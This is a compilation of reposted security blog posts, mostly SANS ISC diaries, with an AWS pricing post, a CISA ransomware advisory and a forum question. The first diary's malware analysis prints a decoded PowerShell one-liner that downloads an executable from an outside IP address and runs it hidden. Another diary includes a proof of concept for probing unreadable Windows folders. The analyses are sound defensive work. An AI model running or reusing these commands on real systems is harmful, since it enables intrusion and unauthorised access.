Simple but Efficient VBScript Obfuscation, (Sat, Feb 22nd)

This post was originally published on this site

Today, it’s easy to guess if a piece of code is malicious or not. Many security solutions automatically detonate it in a sandbox. This remains a quick and (most of the time still) efficient way to get a first idea of the code's behaviour. In parallel, many obfuscation techniques exist to avoid detection by AV products and/or make the life of malware analysts more difficult. Personally, I like to find new techniques and discover how imaginative malware developers can be when implementing new obfuscation techniques.

This morning, I spotted a very simple VBScript of only 50 lines of code. It has an excellent VT score of 1/60[1], but it was spotted by my hunting rule!

Basically, all suspicious keywords that could ring a bell are stored as random strings and replaced during execution. Example:

x010 = Replace(x010,"OXentrew","Executionpolicy")
x010 = Replace(x010,"BCijaMA","bypass")
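This kind of substitution is easy to invert outside the script: collect the Replace() pairs and apply the same substitutions to the payload string. A minimal Python sketch (only the two pairs shown above are from the sample; a full deobfuscator would list all of them):

```python
# Reverse the VBScript obfuscation by replaying its own Replace() substitutions.
# Only the two pairs visible in the sample are listed here.
substitutions = [
    ("OXentrew", "Executionpolicy"),
    ("BCijaMA", "bypass"),
]

def deobfuscate(payload: str) -> str:
    for token, keyword in substitutions:
        payload = payload.replace(token, keyword)
    return payload

print(deobfuscate("-OXentrew BCijaMA"))  # -Executionpolicy bypass
```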

The most interesting variable is the following:

x002 = """" & x004 & """-OXentrew BCijaMA -NNoGayGay " _
  & " -windowstyle caralhos2 -Seisal ""Set-Content -value " _
  & " (new-object" _
  & ".FuiDUi( 'MIGOSEYLOVO54[.]233[.]198[.]219/a.exe' ) " _
  & " -encoding byte -Path  $env:appdataRiCOAOCAONetworkConnections" & rando & "; " _
  & " Start-Process ""$env:appdataRiCOAOCAONetworkConnections" & rando & """"""

Here is the decoded version:

CreateObject("Scripting.FileSystemObject").BuildPath(CreateObject("Wscript.Shell").expandenvironmentstrings( "%systemroot%" ), "System32\WindowsPowerShell\v1.0\powershell.exe" )
  -Executionpolicy bypass
  -windowstyle hidden
  -command "Set-Content -value (new-object Net.WebClient).DownloadData( 'http://54[.]233[.]198[.]219/a.exe' )
                 -encoding byte -Path $env:appdata\Microsoft\NetworkConnections\xxxxx.exe;
            Start-Process $env:appdata\Microsoft\NetworkConnections\xxxxx.exe"

(The dumped payload xxxxx.exe is a random string of 25 characters)

This one-liner downloads and executes a payload. What about the payload? It’s a PuTTY client (SHA256:601cdbddfe6ac894daff506167c164c65446f893d1d5e4b95e92d960ff5f52b0), nothing malicious. There is a good chance that this piece of code was submitted to VT by a Red Team or by attackers who are still brushing up their payload. The IP address is an AWS instance and the homepage returns:

me empresta 10k ai???

This Portuguese sentence means “lend me 10k there ???”


Xavier Mertens (@xme)
Senior ISC Handler – Freelance Cyber Security Consultant

(c) SANS Internet Storm Center. Creative Commons Attribution-Noncommercial 3.0 United States License.

Digital Inheritance

This post was originally published on this site

What happens to our digital presence when we die or become incapacitated? Many of us have or know we should have a will and checklists of what loved ones need to know in the event of our passing. But what about all of our digital data and online accounts? Consider creating some type of digital will, often called a “Digital Inheritance” plan.

Savings Plan Update: Save Up to 17% On Your Lambda Workloads

This post was originally published on this site

Late last year I wrote about Savings Plans, and showed you how you could use them to save money when you make a one or three year commitment to use a specified amount (measured in dollars per hour) of Amazon Elastic Compute Cloud (EC2) or AWS Fargate. Savings Plans give you the flexibility to change compute services, instance types, operating systems, and regions while accessing compute power at a lower price.

Now for Lambda
Today I am happy to be able to tell you that Compute Savings Plans now apply to the compute time consumed by your AWS Lambda functions, with savings of up to 17%. If you are already using one or more Savings Plans to save money on your server-based processing, you can enjoy the cost savings while modernizing your applications and taking advantage of a multitude of powerful Lambda features including a simple programming model, automatic function scaling, Step Functions, and more! If your use case includes a constant level of function invocation for microservices, you should be able to make great use of Compute Savings Plans.

AWS Cost Explorer will now take Lambda usage into account when it recommends a Savings Plan. I open AWS Cost Explorer, then click Recommendations within Savings Plans, then review the recommendations. As I am doing this, I can alter the term, payment option, and the time window that is used to make the recommendations:

When I am ready to proceed, I click Add selected Savings Plan(s) to cart, and then View cart to review my selections and submit my order:

The Savings Plan becomes active right away. I can use Cost Explorer’s Utilization and Coverage reports to verify that I am making good use of my plans. The Savings Plan Utilization report shows the percentage of savings plan commitment that is being used to realize savings on compute usage:

The Coverage report shows the percentage of Savings Plan commitment that is covered by Savings Plans for the selected time period:

When the coverage is less than 100% for an extended period of time, I should think about buying another plan.

Things to Know
Here are a couple of things to know:

Discount Order – If you are using two or more compute services, the plans are applied in order of highest to lowest discount percentage.

Applicability – The discount applies to Lambda duration charges (both on-demand and provisioned concurrency) and to provisioned concurrency charges. It does not apply to Lambda request charges.
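As a rough illustration of how a duration-only discount changes a bill, here is a hedged Python sketch. The per-GB-second and per-request rates below are assumptions for illustration, not quoted AWS pricing; the point is only that the discount touches duration charges, not request charges:

```python
# Illustrative sketch: a Compute Savings Plan discount (up to 17%) applies to
# Lambda duration charges but not to per-request charges. Rates are assumptions.
def monthly_lambda_cost(gb_seconds, requests, duration_discount=0.0,
                        duration_rate=0.0000166667, request_rate=0.20 / 1_000_000):
    duration_charge = gb_seconds * duration_rate * (1 - duration_discount)
    request_charge = requests * request_rate  # unaffected by the plan
    return duration_charge + request_charge

on_demand = monthly_lambda_cost(100_000_000, 50_000_000)
with_plan = monthly_lambda_cost(100_000_000, 50_000_000, duration_discount=0.17)
print(f"on-demand: ${on_demand:,.2f}, with plan: ${with_plan:,.2f}")
```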

Available Now
If you already own a Savings Plan or two and are using Lambda, you will receive a discount automatically (unless you are at 100% utilization with EC2 and Fargate).

If you don’t own a plan and are using Lambda, buy a plan today!



Whodat? Enumerating Who “owns” a Workstation for IR, (Thu, Feb 20th)

This post was originally published on this site

Eventually in almost every incident response situation, you have to start contacting the actual people who sit at the keyboard of affected stations.  Often you’ll want them to step back from the keyboard or log out, for either remote forensics data collection or for remediation.  Or in the worst case, if you don’t have remote re-imaging working in your shop, to either ship their station back to home base for re-imaging or to arrange a local resource to re-image the machine the hard way.

Long story short, what this means is that you need the name of the principal user of that station, and their phone number, preferably their cell number.  Time is usually of the essence in IR, and you can’t always count on or wait for email or voicemail (or VOIP phones either…).  What you will usually find is that often stations will pass from hand-to-hand, outside of IT’s control.  It’s pretty common for managers in remote locations to “stash” a user’s laptop when they leave the company, either as a spare or just to be handy when the next new hire gets onboarded.  It’s also not unheard of for the IT folks re-deploying workstations to make clerical errors as they assign devices (or just plain skip the updates).

What that means is that the hardware / OS / software inventory scripts that we’ve covered in the past only cover 3 of the 4 facets of the actual inventory.  We want to add Userid, Full Username, City / Address and Extension and full phone / cell phone number.  What this also implies is that you want your AD administrators to work more closely with both the telephone and cell phone admins and with HR.  If you use the methods outlined below, it also implies that you’ll be populating the appropriate AD fields with accurate contact information.

First, how do we get the currently logged in user?  We’ve had methods to do this since forever, a few of them are:

Arguably the easiest method is to use pstools.  psloggedon.exe will get you the currently logged in user by scanning the HKEY_USERS registry hive to get logged-in users’ SIDs, then uses the NetSessionEnum API to get the user name.  And, just like psexec, psloggedon will “find a way” – it’ll generally enable what it needs to get the job done, then back out the changes after the data collection is complete.

How does this look?  See below (the -l switch enumerates only locally logged-in user accounts):

> PsLoggedon.exe -nobanner -l nn.nn.nn.nn
Users logged on locally:
     2/4/2020 1:41:40 PM        domainuserid

Note however that this means that you’ll need to loop through each station, and that the station needs to be online to collect this information.

WMIC also does a good job, with similar (and similarly limited) results:

> wmic /node:nn.nn.nn.nn computersystem get username


“nbtstat -a <computername>” was the way to get this info back in the day, but I’m not seeing great success with this command in a modern network.

Query.exe and qwinsta both still work great though:

> query user /server:<hostname or ip>
 <userid>              console             1  Active      none   2/4/2020 1:41 PM

 > qwinsta /server:<hostname or ip>
 <userid>              console             1  Active      none   2/4/2020 1:41 PM

The problem with all of these is that it just gets us the username – we still have to look up any contact info somewhere else.  This may be simple if your AD is up (or your Exchange / email Services if the GAL serves as your phone book), but might be more difficult if your security incident is more widespread.

More importantly, these all give us the username as a string, with lots of other cruft all around the one string of interest.  This is fine for 1-2-3 hosts, but if you’re collecting info for hundreds or thousands of hosts, not so much.
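If you do stay with the command-line tools at scale, the cruft can be stripped programmatically. A hedged Python sketch of pulling the userid out of query user-style output (the column layout is assumed to match the sample above and may differ on localized systems):

```python
# Extract userids from the text that "query user /server:<host>" prints.
# Assumes the default English column layout shown in the diary.
def parse_query_user(output: str) -> list[str]:
    users = []
    for line in output.splitlines():
        fields = line.split()
        # skip blank lines and the header row; the userid is the first field,
        # and the current session is prefixed with ">" which we strip
        if fields and fields[0].upper() != "USERNAME":
            users.append(fields[0].lstrip(">"))
    return users

sample = (" USERNAME  SESSIONNAME  ID  STATE  IDLE TIME  LOGON TIME\n"
          " jdoe  console  1  Active  none  2/4/2020 1:41 PM")
print(parse_query_user(sample))  # ['jdoe']
```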

How about adding user collection to our previous hardware inventory script (in PowerShell)?  This is pretty easy also, and also allows us to add in our contact details.

To get a logged in user:

$a = Get-WmiObject -ComputerName <hostname or ip> -Class Win32_ComputerSystem | Select-Object UserName


(Get-CimInstance works exactly the same way)

Parsing this out to just the username string:

$a.username | ConvertFrom-String -Delimiter "\\"

P1          P2    
—          —    
DOMAIN      userid

$currentuser = ($a.username | ConvertFrom-String -Delimiter "\\").p2

What if our user isn’t logged in, but the machine is powered on?  In that case, we’re digging into the security event log on that machine, looking for event ID 4624.  In some cases we’ll see multiple users logging into a computer, so we’ll go back “N” days, and pick the user with the largest count of logins as our principal user for that station.  Note that logon type 2 is a local interactive login, so that’s what we’re looking for in “$_.properties[8].value -eq 2”.  An alternative view is that you’ll want to collect all the users of that host, since the principal user might not be available when you call.

$days = -1

$filter = @{
    Logname = 'Security'
    ID = 4624
    StartTime =  [datetime]::now.AddDays($days)
    EndTime = [datetime]::now
}

$events += Get-WinEvent -FilterHashtable $filter -ComputerName $WorkstationNameOrIP

$b = $events | where { $_.properties[8].value -eq 2 }

Now, on the AD side, let’s add in the information collection for phone and email info:

$userinfo = Get-ADUser -filter * -properties Mobile, TelephoneNumber, EmailAddress | select samaccountname, name, telephonenumber, mobile, emailaddress

Finally, adding the hardware info from our existing hardware inventory script, we can join the two blocks of information by workstation name, using DNS (we’ll do this in a few paragraphs).  This is more reliable than just using the IP address returned in $pcs, as workstations commonly now have both wired and wireless IPs, so that field is not our most reliable bit of info.

$pcs = get-adcomputer -filter * -property Name,dnshostname,OperatingSystem,Operatingsystemversion,LastLogonDate,IPV4Address

How about if we need to get the username for a station that’s powered off or disconnected?  Remember that during a security incident that target machine might not be operable, or it might be remote.  That’s a bit more time consuming, we’ll need to query AD for users who have logged into the target station.  If multiple users have logged in, then most likely we’ll want the person who has logged in the most, or the complete list with a count for each user.  More useful, a database of all stations and logins can be refreshed weekly, then used to verify our inventory database or just saved so that we have current information in the event of an incident.
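The "pick the principal user" step described above is just a frequency count over (station, user) pairs. A Python sketch with hypothetical login data standing in for the parsed 4624 events:

```python
from collections import Counter, defaultdict

# Hypothetical (station, user) pairs as they would come out of event ID 4624 records.
logins = [
    ("WKS01", "alice"), ("WKS01", "alice"), ("WKS01", "helpdesk"),
    ("WKS02", "bob"),
]

# Count logins per user, per station
by_station = defaultdict(Counter)
for station, user in logins:
    by_station[station][user] += 1

# Principal user = the account with the most logins on each station
principal = {stn: users.most_common(1)[0][0] for stn, users in by_station.items()}
print(principal)  # {'WKS01': 'alice', 'WKS02': 'bob'}
```

Keeping the full Counter per station also gives you the "complete list with a count for each user" mentioned above, for stations that are genuinely shared.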

In preparation for this, you’ll want to ensure that you are logging all user logins.  The best advice is that you want both successful and failed logins (for obvious reasons), though for this application we need successful logins.  In group policy editor, these settings are at:
Computer Configuration > Policies > Windows Settings > Security Settings > Advanced Audit Policy Configuration > Audit Policies > Login/Logoff > Audit Logon (choose both Success and Failure)

And yes, for reasons unknown Microsoft has these both disabled by default (most vendors follow this same not-so-intuitive path).  Maybe some 1990’s reason like “disk is expensive” or something …

Anyway, with that enabled, we can now query the event log:


# collect a week of data (fewer days will speed up this script)

$days = -7

$filter = @{
    Logname = 'Security'
    ID = 4624
    StartTime =  [datetime]::now.AddDays($days)
    EndTime = [datetime]::now
}

$events = Get-WinEvent -FilterHashtable $filter -ComputerName $DC.Hostname

To harvest the information of interest, the fields we want are:

$events[n].Properties[5] for the userid
$events[n].Properties[8] needs to be 2 for a local login, or 3 for a remote login.  If you are querying AD logs on the DCs, you’ll want Logon Type 3.
$events[n].Properties[18] for the ip address of workstation

Putting this all into one script:

$U_TO_S = @()
$events = @()

$days = -1
$filter = @{
    Logname = 'Security'
    ID = 4624
    StartTime =  [datetime]::now.AddDays($days)
    EndTime = [datetime]::now
}

# Get your AD information
$DomainName = (Get-ADDomain).DNSRoot
# Get all DCs in the Domain
$AllDCs = Get-ADDomainController -Filter * -Server $DomainName | Select-Object Hostname,Ipv4address,isglobalcatalog,site,forest,operatingsystem

foreach($DC in $AllDCs) {
    if (test-connection $DC.hostname -quiet) {
        # collect the events
        write-host "Collecting from server" $dc.hostname
        $events += Get-WinEvent -FilterHashtable $filter -ComputerName $DC.Hostname
    }
}

# filter to network logins only (Logon Type 3), userid and ip address only
$b = $events | where { $_.properties[8].value -eq 3 } | `
     select-object @{Name="user"; expression={$_.properties[5].value}}, `
     @{name="ip"; expression={$_.properties[18].value} }

# filter out computer account logins (name ends in $) and any other logins that won't apply (in this case "ends in ADFS")
# as we are collecting the station IPs, adding an OS filter to remove anything that includes "Server" might also be useful
# filter out duplicate username and ip combos
$c = $b | where { $_.user -notmatch 'ADFS$' } | where { $_.user -notmatch '\$$' } | sort-object -property user,ip -unique

# collect all user contact info from AD
# this assumes that these fields are populated
$userinfo = Get-ADUser -filter * -properties Mobile, TelephoneNumber, EmailAddress | select samaccountname, name, telephonenumber, mobile, emailaddress | sort samaccountname

# combine our data into one "users to stations to contact info" variable
# any non-ip stn fields will error out - for instance "-".  This is not a problem
foreach ( $logevent in $c ) {
    $u = $userinfo | where { $_.samaccountname -eq $logevent.user }
    $tempobj = [pscustomobject]@{
        user = $logevent.user
        stn = [System.Net.Dns]::GetHostByAddress($logevent.ip).hostname
        mobile = $u.mobile
        telephone = $u.telephonenumber
        emailaddress = $u.emailaddress
    }
    $U_to_S += $tempobj
}

# we can easily filter here too
# in this case we are filtering out Terminal Servers (or whatever) by hostname and removing duplicate entries
$user_to_stn_db = $U_TO_S | where { $_.stn -notmatch 'TS' } | sort-object -property stn, user -unique | sort-object -property user

$user_to_stn_db | Out-GridView

This will get you close to a final “userid + contacts + workstation” database.  What you’ll likely want to add is any additional filters, maybe to remove any VDI station logins, named-user admin accounts and so on.  If you are seeing ANONYMOUS logins, logins with the built-in “Administrator” account, service accounts and so on, you’ll likely want to filter those out, but maybe investigate them first.
Again, with the hostnames and IP addresses in hand it’s now easy to get the station’s OS from our previous inventory scripts, and maybe filter out anything that has the word “Server” in it if the goal is to collect username – workstation information. 

At some point you’ll have some manual edits to do, but a script like this can go a long way towards verifying an existing inventory and contact database, creating a new one from scratch, or just producing a handy “who logs into what” list with phone numbers.  Remember, for IR you’re not so much concerned with who “owns” a station as with who logs into it often (so you can find those people and then physically find that station).
So if you have 3 people sharing one station, if your list has all 3 people that’s a win!

As always, I’ll have this script in my github – look in “Critical Controls / CC01”

If you can, try a script like this in your environment, then use our comment form to let us know if you find anything “odd”.

Rob VandenBrink

(c) SANS Internet Storm Center. Creative Commons Attribution-Noncommercial 3.0 United States License.

AA20-049A: Ransomware Impacting Pipeline Operations

This post was originally published on this site

Original release date: February 18, 2020


Note: This Activity Alert uses the MITRE Adversarial Tactics, Techniques, and Common Knowledge (ATT&CK™) framework. See the MITRE ATT&CK for Enterprise and ATT&CK for Industrial Control Systems (ICS) frameworks for all referenced threat actor techniques and mitigations.

This Activity Alert summarizes an incident to which CISA recently responded. It is being shared publicly to promote awareness and encourage mitigations by asset owner operators across all critical infrastructure sectors.

The Cybersecurity and Infrastructure Security Agency (CISA) responded to a cyberattack affecting control and communication assets on the operational technology (OT) network of a natural gas compression facility. A cyber threat actor used a Spearphishing Link [T1192] to obtain initial access to the organization’s information technology (IT) network before pivoting to its OT network. The threat actor then deployed commodity ransomware to Encrypt Data for Impact [T1486] on both networks. Specific assets experiencing a Loss of Availability [T826] on the OT network included human machine interfaces (HMIs), data historians, and polling servers. Impacted assets were no longer able to read and aggregate real-time operational data reported from low-level OT devices, resulting in a partial Loss of View [T829] for human operators. The attack did not impact any programmable logic controllers (PLCs) and at no point did the victim lose control of operations. Although the victim’s emergency response plan did not specifically consider cyberattacks, the decision was made to implement a deliberate and controlled shutdown to operations. This lasted approximately two days, resulting in a Loss of Productivity and Revenue [T828], after which normal operations resumed. CISA is providing this Alert to help administrators and network defenders protect their organizations against this and similar ransomware attacks.

Technical Details

Network and Assets

  • The victim failed to implement robust segmentation between the IT and OT networks, which allowed the adversary to traverse the IT-OT boundary and disable assets on both networks.
  • The threat actor used commodity ransomware to compromise Windows-based assets on both the IT and OT networks. Assets impacted on the organization’s OT network included HMIs, data historians, and polling servers.
  • Because the attack was limited to Windows-based systems, PLCs responsible for directly reading and manipulating physical processes at the facility were not impacted.
  • The victim was able to obtain replacement equipment and load last-known-good configurations to facilitate the recovery process.
  • All OT assets directly impacted by the attack were limited to a single geographic facility.

Planning and Operations

  • At no time did the threat actor obtain the ability to control or manipulate operations. The victim took HMIs that read and control operations at the facility offline. A separate and geographically distinct central control office was able to maintain visibility but was not instrumented for control of operations.
  • The victim’s existing emergency response plan focused on threats to physical safety and not cyber incidents. Although the plan called for a full emergency declaration and immediate shutdown, the victim judged the operational impact of the incident as less severe than those anticipated by the plan and decided to implement limited emergency response measures. These included a four-hour transition from operational to shutdown mode combined with increased physical security.
  • Although the direct operational impact of the cyberattack was limited to one control facility, geographically distinct compression facilities also had to halt operations because of pipeline transmission dependencies. This resulted in an operational shutdown of the entire pipeline asset lasting approximately two days.
  • Although they considered a range of physical emergency scenarios, the victim’s emergency response plan did not specifically consider the risk posed by cyberattacks. Consequently, emergency response exercises also failed to provide employees with decision-making experience in dealing with cyberattacks.
  • The victim cited gaps in cybersecurity knowledge and the wide range of possible scenarios as reasons for failing to adequately incorporate cybersecurity into emergency response planning.


Asset owner operators across all sectors are encouraged to consider the following mitigations using a risk-based assessment strategy.

Planning and Operational Mitigations

  • Ensure the organization’s emergency response plan considers the full range of potential impacts that cyberattacks pose to operations, including loss or manipulation of view, loss or manipulation of control, and loss of safety. In particular, response playbooks should identify criteria to distinguish between events requiring deliberate operational shutdown versus low-risk events that allow for operations to continue.
  • Exercise the ability to fail over to alternate control systems, including manual operation while assuming degraded electronic communications. Capture lessons learned in emergency response playbooks.
  • Allow employees to gain decision-making experience via tabletop exercises that incorporate loss of visibility and control scenarios. Capture lessons learned in emergency response playbooks.
  • Identify single points of failure (technical and human) for operational visibility. Develop and test emergency response playbooks to ensure there are redundant channels that allow visibility into operations when one channel is compromised.
  • Implement redundant communication capabilities between geographically separated facilities responsible for the operation of a single pipeline asset. Coordinate planning activities across all such facilities.
  • Recognize the physical risks that cyberattacks pose to safety and integrate cybersecurity into the organization’s safety training program.
  • Ensure the organization’s security program and emergency response plan consider third parties with legitimate need for OT network access, including engineers and vendors.

Technical and Architectural Mitigations

  • Implement and ensure robust Network Segmentation [M1030] between IT and OT networks to limit the ability of adversaries to pivot to the OT network even if the IT network is compromised. Define a demilitarized zone (DMZ) that eliminates unregulated communication between the IT and OT networks.
  • Organize OT assets into logical zones by taking into account criticality, consequence, and operational necessity. Define acceptable communication conduits between the zones and deploy security controls to Filter Network Traffic [M1037] and monitor communications between zones. Prohibit Industrial Control System (ICS) protocols from traversing the IT network.
  • Require Multi-Factor Authentication [M1032] to remotely access the OT and IT networks from external sources.
  • Implement regular Data Backup [M1053] procedures on both the IT and OT networks. Ensure that backups are regularly tested and isolated from network connections that could enable the spread of ransomware.
  • Ensure user and process accounts are limited through Account Use Policies [M1036], User Account Control [M1052], and Privileged Account Management [M1026]. Organize access rights based on the principles of least privilege and separation of duties.
  • Enable strong spam filters to prevent phishing emails from reaching end users. Implement a User Training [M1017] program to discourage users from visiting malicious websites or opening malicious attachments. Filter emails containing executable files from reaching end users.
  • Filter Network Traffic [M1037] to prohibit ingress and egress communications with known malicious Internet Protocol (IP) addresses. Prevent users from accessing malicious websites using Uniform Resource Locator (URL) blacklists and/or whitelists.
  • Update Software [M1051], including operating systems, applications, and firmware on IT network assets. Use a risk-based assessment strategy to determine which OT network assets and zones should participate in the patch management program. Consider using a centralized patch management system.
  • Set Anti-virus/Anti-malware [M1049] programs to conduct regular scans of IT network assets using up-to-date signatures. Use a risk-based asset inventory strategy to determine how OT network assets are identified and evaluated for the presence of malware.  
  • Implement Execution Prevention [M1038] by disabling macro scripts from Microsoft Office files transmitted via email. Consider using Office Viewer software to open Microsoft Office files transmitted via email instead of full Microsoft Office suite applications.
  • Implement Execution Prevention [M1038] via application whitelisting, which only allows systems to execute programs known and permitted by security policy. Implement software restriction policies (SRPs) or other controls to prevent programs from executing from common ransomware locations, such as temporary folders supporting popular internet browsers or compression/decompression programs, including the AppData/LocalAppData folder.
  • Limit Access to Resources over Network [M1035], especially by restricting Remote Desktop Protocol (RDP). If after assessing risks RDP is deemed operationally necessary, restrict the originating sources and require Multi-Factor Authentication [M1032].



  • February 18, 2020: Initial Version

This product is provided subject to this Notification and this Privacy & Use policy.

Need to raise an advisory case regarding the ESXi and Firmware upgrade for HP Proliant Servers (BL 460c Gen9 Model)

This post was originally published on this site

Hi Team,


Need to raise an advisory case regarding the ESXi and Firmware upgrade for HP Proliant Servers (BL 460c Gen9 Model)


1. Running BIOS Firmware version I36 Date 1/21/2018 and ESXI version 6.5 build number 7388607


2. Need to upgrade the SPP version to 2019.09.0 and ESXi version update to 6.5 build number 15256549


So, kindly suggest the standard procedure here: does the firmware or ESXi need to be upgraded first?




Discovering contents of folders in Windows without permissions, (Tue, Feb 18th)

This post was originally published on this site

I recently noticed an interesting side effect of the way in which Windows handles local file permissions, which makes it possible for a non-privileged user to brute-force contents of a folder for which they don’t have read access (e.g. Read or List folder contents) permissions. It is possible that it is a known technique, however as I didn’t find any write-ups on it anywhere, I thought I’d share it here.

The issue/vulnerability belongs to the CWE-203: Information Exposure Through Discrepancy[1] family and lies in the fact that Windows returns different messages/errors when a user attempts to access an existing file or folder for which he doesn’t have read permissions and when he attempts to access a non-existent file or folder. This is true even if he attempts to access existing and non-existent files within a folder for which he doesn’t have any permissions.

The behavior is similar to a vulnerability commonly present in the login functions of web applications. In the case of a vulnerable web app, the login function returns different responses when a user tries to log in with an existing username and a wrong password and when he tries to log in with a non-existent username. This vulnerability is customarily checked during penetration tests since, although a valid username by itself doesn’t help potential threat actors too much, it isn’t something we want to offer to them freely.

To demonstrate the issue present in Windows, I created two user accounts on a Windows 10 test machine. First one was an admin account named “user” (and yes, in hindsight this was not the most fortunate name for an admin account) and the second, a non-privileged account, was named “Test”. I further created a folder named “Secret”, containing a file “secret.txt”, with explicit Full control permissions set up for SYSTEM, the Administrators group and the “user” account and no permissions for the “Test” account.

It is obvious that the “Test” account wouldn’t be able to access the folder or list its contents. However, using error messages, for example those generated by attempts to change the currently open directory (cd), the user might infer whether a file or subfolder exists.

Using the error messages, it would be a trivial matter to automate guessing of filenames using a dictionary or a brute-force attack.
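To illustrate how trivial that automation is, here is a hedged Python sketch of the same dictionary attack. The wordlist and the C:\Secret path are illustrative placeholders; the behaviour relies on os.stat() surfacing the different Windows errors as distinct exception types:

```python
import os

def probe(path):
    """Classify a path the caller may not be able to read: on Windows, an
    existing file inside a forbidden folder raises PermissionError, while a
    non-existent one raises FileNotFoundError - the CWE-203 discrepancy."""
    try:
        os.stat(path)
        return "accessible"
    except PermissionError:
        return "exists (access denied)"
    except FileNotFoundError:
        return "does not exist"

# hypothetical wordlist; C:\Secret matches the folder described in the diary
for name in ["secret.txt", "passwords.xlsx", "notes.docx"]:
    print(name, "->", probe(os.path.join(r"C:\Secret", name)))
```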
Before I noticed that the cd command (and many others) might be used in this way, I wrote a very simple C# PoC app, which can provide the same information and which could easily be converted to brute-force filenames or “guess” them, based on a dictionary.

static void Main(string[] args)
{
	Console.WriteLine("Input a path to a file to see whether it is accessible, or - if inaccessible - whether it exists or not.");
	Console.WriteLine("Input 'exit' to exit.");
	string input = Console.ReadLine();
	while (input != "exit")
	{
		try
		{
			System.IO.File.OpenRead(input).Close();  // File.OpenRead assumed here; the original access call was lost
			Console.WriteLine("Access permitted");
		}
		catch (Exception e) { Console.WriteLine(e.GetType().Name); }  // UnauthorizedAccessException = exists; FileNotFoundException = doesn't
		input = Console.ReadLine();
	}
}

Similar guessing of paths to the one, which we could employ here, is often used to discover contents of different paths on web servers. Unlike on web servers however, in Windows environments we usually can’t access the contents of the files and subfolders we discover through a simple HTTP GET request. So is this vulnerability actually useful in any way?

By itself not so much, at least in most cases. Although it is definitely unpleasant, without chaining it with some exploit that would actually enable an attacker to read the data in discovered files, all it can do is let a potential malicious actor infer that some file or folder exists. This may be useful for some red teaming activities, but that’s about it.

The only exception I can imagine would be a situation when a folder is present on a file system with misconfigured explicit permissions set for subfolders contained within it. In Windows operating systems, it is possible to grant a user permission to interact with a subfolder, even though they don’t have any permissions set for the parent folder. In real life, cases of this nature will be few and far between and most will probably be the result of a mistake by an administrator. Nevertheless, if such a folder were present on a target machine, finding and accessing it would be at least plausible for an attacker. To demonstrate this concept, I’ve created a subfolder “Not_secret” within the C:\Secret path, containing a file named “not_secret.txt”.

Afterwards, I gave explicit permissions for this subfolder to our “Test” user.

As you may see from the following output of the PoC app mentioned above, the “Test” user would be able to interact with the subfolder, if he were to find it, even though he can’t interact with the parent folder.

As far as I’ve been able to determine, the CWE-203 condition is only present when interacting with local drives, not with remote file shares. A malicious user would therefore need direct access to the machine on which the folders he wants to brute-force are present. Moreover, discovering their contents would definitely not be quick work for him. Nevertheless, although the guessing speed an attacker might achieve would be slow, and even though the confidentiality impact would be quite limited, this behavior of Windows is certainly less than ideal.

I’ve informed the Microsoft Security Response Center about the vulnerability; however, as they have determined that it does not meet the bar for security servicing, it will not be patched. Although this may be viewed as a less-than-optimal result, one positive point does come out of it – in the future, if we ever need to determine what a folder we can’t access actually contains, we have at least this (very inefficient) technique available to find out.

Jan Kopriva
Alef Nula

(c) SANS Internet Storm Center. Creative Commons Attribution-Noncommercial 3.0 United States License.

curl and SSPI, (Mon, Feb 17th)


There’s an interesting comment on Xavier’s diary entry “Keep an Eye on Command-Line Browsers” (paraphrasing): a proxy with authentication will prevent wget and curl from accessing the Internet because they don’t do integrated authentication.

As it happens, for a couple of months now I’ve been using curl on Windows with SSPI to authenticate to a proxy. I use the following command:

curl --proxy proxyname:proxyport --proxy-ntlm -U :

First, you need a version of curl with SSPI support:

Windows 10’s version of curl does support SSPI.
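You can check this yourself: when SSPI support was compiled in, the Features line of curl’s version banner lists SSPI (note that third-party curl builds, and builds on other platforms, will typically list different features):

```shell
# Print curl's version banner; on a Windows 10 build the "Features:" line
# should include SSPI (non-Windows builds typically will not list it).
curl --version | head -n 3
```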

With this, I can connect to my proxy (--proxy) and authenticate (--proxy-ntlm) without having to provide credentials to authenticate to the proxy (-U :). curl will use SSPI to perform integrated authentication to the proxy. This is explained in curl’s man page:

If you use a Windows SSPI-enabled curl binary and do either Negotiate or NTLM authentication then you can tell curl to select the user name and password from your environment by specifying a single colon with this option: “-U :”.

curl’s SSPI feature can also be used to authenticate to an internal IIS server.

By default, curl will not authenticate to a proxy, but it can be directed to do so via options.

I didn’t find a version of wget that supports SSPI. If you know one, or you made one, please post a comment.


Didier Stevens
Senior handler
Microsoft MVP


SOAR or not to SOAR?, (Sun, Feb 16th)


Security Orchestration, Automation and Response (SOAR) tools allow organizations to collect data about security threats from multiple sources and automate appropriate responses to repetitive tasks. As an analyst, you need to juggle and pivot several times a day between multiple tools and devices to evaluate a huge amount of information and deal with a flood of repetitive tasks such as alerts, tickets, email, threat intelligence data, etc. The end goal is to centralize everything in one location and improve analysis using captured institutionalized knowledge.

If you are already using a SOAR tool, what were the main reasons you bought it, and did it improve your ability to standardize response procedures in a digital workflow format and apply best practices?

If you are not using SOAR but are considering implementing it, what are the main qualities you are looking for in this tool?

Guy Bruneau IPSS Inc.
My Handler Page
Twitter: GuyBruneau
gbruneau at isc dot sans dot edu


bsdtar on Windows 10, (Sat, Feb 15th)


Reading Xavier’s diary entry “Keep an Eye on Command-Line Browsers”, I wondered: when exactly was curl introduced in Windows 10?

I found this Microsoft blog post from December 2017: “Tar and Curl Come to Windows!”.

Indeed, another surprise to me: tar (bsdtar) is also a command-line utility that comes with vanilla Windows 10.
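A quick way to confirm the bundled tar works as expected – the same commands run under bsdtar on Windows 10 and under GNU tar elsewhere (the file names here are just examples):

```shell
# Create a small folder, archive it, then list the archive's contents.
mkdir -p demo && echo "hello" > demo/a.txt
tar -czf demo.tar.gz demo
tar -tzf demo.tar.gz   # lists demo/ and demo/a.txt
```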

Didier Stevens
Senior handler
Microsoft MVP
